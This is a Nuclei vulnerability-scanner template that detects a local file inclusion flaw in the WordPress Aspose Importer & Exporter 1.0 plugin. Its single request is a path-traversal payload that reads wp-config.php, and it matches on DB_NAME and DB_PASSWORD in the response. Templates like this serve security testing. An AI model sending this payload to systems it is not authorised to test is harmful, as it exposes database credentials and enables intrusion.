nuclei-templates/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml

32 lines
832 B
YAML
Raw Normal View History

id: aspose-ie-file-download
info:
name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion.
reference:
- https://packetstormsecurity.com/files/131162/
- https://wordpress.org/plugins/aspose-importer-exporter
tags: aspose,packetstorm,wordpress,wp-plugin,lfi
metadata:
max-request: 1
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200